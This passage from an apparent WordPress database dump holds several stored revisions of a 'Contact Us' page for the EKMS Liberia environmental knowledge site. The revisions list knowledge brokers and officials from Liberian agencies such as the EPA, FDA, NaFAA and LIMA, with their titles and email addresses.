src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:33:42','2021-01-22 10:33:42','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3404,42,'2021-01-22 10:34:12','2021-01-22 10:34:12','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:34:12','2021-01-22 10:34:12','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3405,42,'2021-01-22 10:34:12','2021-01-22 10:34:12','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:34:12','2021-01-22 10:34:12','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3406,42,'2021-01-22 10:34:12','2021-01-22 10:34:12','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed 